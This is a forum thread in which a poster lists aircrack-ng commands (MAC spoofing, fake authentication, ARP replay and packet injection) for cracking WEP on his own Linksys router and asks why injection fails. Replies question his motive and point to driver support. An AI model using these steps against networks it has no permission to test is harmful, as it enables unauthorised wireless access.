Results 1 to 4 of 4

Thread: Problem Injecting IVs using BT4 and Asus WL-138GE

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    1

    Default Problem Injecting IVs using BT4 and Asus WL-138GE

    Hello

    Iím trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.

    I have a Linksys WRT54G ver. 1.1 wireless router with all settings default with the exception of WEP encryption turned on. MAC address filtering is not enabled. I have a desktop computer with an Asus WL-138GE wireless nic that has a Broadcom chipset. I am running Backtrack 4 pre Final from a live CD and Iím having a problem injecting IVs. These are the commands Iím running:

    Code:
    Iwconfig
    - This gives me low, eth0, wmaster0 and wlan0. I assume wlan0 is the interface Iím looking for.

    Code:
    airmon-ng stop wlan0
    - Interface wlan0 with driver ďb43 Ė [phy0]Ē is reporting monitor mode disabled.

    Code:
    macchanger --mac 00:02:B3:EC:EE:F2 wlan0
    - Spoofs the MAC to an Intel corporation. I use this because Iíve read that some routers automatically reject MACs that are not real such as 00:11:22:33:44:55

    Code:
    airmon-ng start wlan0
    - This enables monitor mode on mon0 which is my monitoring interface

    Code:
    airodump-ng mon0
    - Gives me a list of all access points. My Linksys shows up here.

    Code:
    airodump-ng -c 6 -w linksys.out --bssid xx:xx:xx:xx:xx:xx mon0
    - Starts dumping the IVs sent to that access point to linksys.out. xx:xx:xx:xx:xx:xx is of course the access pointís MAC.

    At this point I open a new konsole and leave the other one to log.

    Code:
    aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 -e linksys wlan0
    - Attempts to authenticate/associate with the router. I get the following message when this is run:
    - Sending Authentication Request (Open system) [ACK]
    - Authentication successful
    - Sending Association Request [ACK]
    - Association successful :-) (AID: 1)

    Code:
    aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
    - This command should start injecting IVs and my #Data should be going up in my logging screen but it isnít. This is what I get:
    - Read xxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packetsÖ(0 pps)

    At this point Iíve read that this command could also work:

    Code:
    Aireplay-ng -2 Ėp 0841 Ėc FF:FF:FF:FF:FF:FF Ėb xx:xx:xx:xx:xx:xx Ėh 00:02:B3:EC:EE:F2 wlan0
    - It only says Read xxx packets and my #Data does not increase

    If I attach another computer to the access point and start browsing the web my #Data goes up and I can crack the key but I want to break the password without a client attached. I thought maybe injection isnít working so I tried the following:

    Code:
    Aireplay-ng -9 wlan0
    - It tells me injection is working and found my Linksys. With the direct probe request it gave me 30/30 100% for my Linksys.

    Iíve been searching and reading the replies on this board in an attempt to try to find a solution to this problem but I havenít come across anything thatís helped me. If anyone has any suggestions please post away. Thanks.

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Just tell him that it is working, that WEP is absolutely insecure.

    You should check, if you chipset is supporting injection at all.

    Seems like bosses around the world have real big security concerns about WLANs lately.
    Tiocfaidh Šr lŠ

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by Dr.Chud View Post
    Iím trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.
    If anyone has any suggestions please post away. Thanks.
    Yeah here is a suggestion. One come clean and admit what you are doing and maybe you will get some help.
    Or two, google = why wep is weak
    Google
    Take a look at a few of the websites and then write up a brief summary showing why it is weak and what the better alternatives are.
    Use a few catch "buzz-words", and maybe a graphic or two.
    Should take about 30-40 minutes to complete.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Member
    Join Date
    Jan 2010
    Posts
    83

    Default

    Quote Originally Posted by Dr.Chud View Post
    Hello

    Iím trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.

    I have a Linksys WRT54G ver. 1.1 wireless router with all settings default with the exception of WEP encryption turned on. MAC address filtering is not enabled. I have a desktop computer with an Asus WL-138GE wireless nic that has a Broadcom chipset. I am running Backtrack 4 pre Final from a live CD and Iím having a problem injecting IVs. These are the commands Iím running:

    Dr.Chug, check out hxxp://www.aircrack-ng.org/doku.php?id=compatibility_drivers to see if your card supports injection. Seems like the earlier G version does not.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •